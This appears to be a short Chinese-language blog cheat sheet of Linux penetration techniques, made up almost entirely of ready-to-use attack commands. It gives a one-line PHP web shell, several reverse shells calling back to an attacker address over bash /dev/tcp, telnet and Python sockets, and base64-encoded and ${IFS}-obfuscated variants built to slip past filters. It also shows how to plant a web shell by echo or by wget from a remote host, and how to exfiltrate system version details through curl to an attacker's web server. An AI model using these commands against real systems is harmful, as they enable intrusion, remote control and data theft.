linux下常用渗透手法
摘要:记录一下linux下常用渗透手法
反弹bashshell
php环境
php木马如下:
<?php @system($_GET['cmd']) ?>
对应的反弹bash命令如下(注意拼接到url中的时候需要进行urlencode编码):
// 将192.168.1.111、443分别替换为服务器的ip地址、端口
bash -c "bash -i >& /dev/tcp/192.168.1.111/443 0>&1"
telnet 192.168.1.111 2000 | /bin/bash | telnet 192.168.1.111 5555
/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.111",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# 不指定路径版本,比较通用
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.111",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMTEvMjAwMCAwPiYx" | base64 -d | bash
echo${IFS}"L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMTEvMjAwMCAwPiYx"${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash
植入webshell
php环境
php木马如下:
<?php @system($_GET['cmd']) ?>
https://192.168.1.2/admin/test.php?cmd=echo '<?php @system($_GET["config"]) ?>' > ./config.php
https://192.168.1.2/admin/test.php?cmd=wget -O ./config.php http://xx.xx.xx/config.php
查看linux版本
bash命令
uname -a
cat /etc/*release
cat /etc/issue
lsb_release -a
url带出版本
# 在192.168.1.111启动一个web服务器,即可获取目标机器内核信息
curl http://192.168.1.111/test$(grep PRETTY_NAME /etc/os-release | cut -d'=' -f2 | tr -d '"')
curl "http://192.168.1.111/info$(lsb_release -d -s)"
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。